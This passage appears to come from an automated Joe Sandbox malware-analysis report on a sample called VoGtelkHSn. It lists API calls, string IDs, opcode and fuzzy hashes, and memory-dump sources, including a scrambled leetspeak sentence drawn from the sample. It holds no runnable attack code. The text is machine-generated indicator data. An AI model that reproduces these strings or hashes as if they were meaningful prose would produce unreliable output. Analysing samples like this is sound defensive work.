                                                      • String ID: ru$M3
                                                      • API String ID: 237503144-652937946
                                                      • Opcode ID: 103d3fe5a7db0c83f1ebe805be3a67d3ced831ce374e262ff3f3ddc4eeca0531
                                                      • Instruction ID: eb579268984cec9a3d4f8951e9de4564882824f2511b5991d6c692009245d9a3
                                                      • Opcode Fuzzy Hash: 103d3fe5a7db0c83f1ebe805be3a67d3ced831ce374e262ff3f3ddc4eeca0531
                                                      • Instruction Fuzzy Hash: 9A5151B1108381AFE714CF00C990B5BBBE5ABC6354F10892DF8A94B380C775DA46CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02EC3848
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,?,?,?), ref: 02EC3879
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: E&eb
                                                      • API String ID: 237503144-175690455
                                                      • Opcode ID: f175120c04625626270d9f4230c6652a575bedf3d9f98b4f8ced415559b9b3ff
                                                      • Instruction ID: 5e7601fd32ac3232652fc0fb831a62975d607b6e5dc294d0a53e58c3d42df29e
                                                      • Opcode Fuzzy Hash: f175120c04625626270d9f4230c6652a575bedf3d9f98b4f8ced415559b9b3ff
                                                      • Instruction Fuzzy Hash: 81619271640B409FD328CF64C981B67B3E6AF84314F24EA2CE4AAC76D4E774B545CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004135E1
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,?,?,?), ref: 00413612
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: E&eb
                                                      • API String ID: 237503144-175690455
                                                      • Opcode ID: 121384bb134e3370c515887561e4bff28e3ea622f5c04769a53e04112e5161fb
                                                      • Instruction ID: 3627e64b03e8dace2a403a76fce9a7d6649682aa9ea1d52bf6d0af3834cb9b1a
                                                      • Opcode Fuzzy Hash: 121384bb134e3370c515887561e4bff28e3ea622f5c04769a53e04112e5161fb
                                                      • Instruction Fuzzy Hash: F761A171600B009FD338CF24C882BA7B3E6EB45315F148A2DE4AAC77D0E778B9858B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000D,m%s,00000008,?), ref: 02EE201A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: m%s$!EJK
                                                      • API String ID: 237503144-2691780584
                                                      • Opcode ID: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
                                                      • Instruction ID: 9266dac1e67613aff4edc8509a72878e31d1d4cbbb5446324abb8f69343ffb7d
                                                      • Opcode Fuzzy Hash: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
                                                      • Instruction Fuzzy Hash: 1A2189B14083908FD304CF55D891B5BBBF4FB86358F110A2CF9A6AB280D775D905CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000D,m%s,00000008,?), ref: 00431DB3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: m%s$!EJK
                                                      • API String ID: 237503144-2691780584
                                                      • Opcode ID: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
                                                      • Instruction ID: 1bf3f748f95ab631ae595585e1a386fe61c7083a19ceef915992d3bd27d4ea4a
                                                      • Opcode Fuzzy Hash: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
                                                      • Instruction Fuzzy Hash: 4D219AB14083908FD304CF15D891B5BBBF4FB8A348F110A2DF9A1AB280D775D905CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      • in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified, xrefs: 02EB8F24
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified
                                                      • API String ID: 621844428-4175449110
                                                      • Opcode ID: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
                                                      • Instruction ID: 95fd08da501db92213420454d2aec9f6f13e07811780a553ce39396cbd9c217e
                                                      • Opcode Fuzzy Hash: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
                                                      • Instruction Fuzzy Hash: 34F049B188820CD6CF12FB76690D2EF7A5FAE11314F04F567E89651314D7349104CAA3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%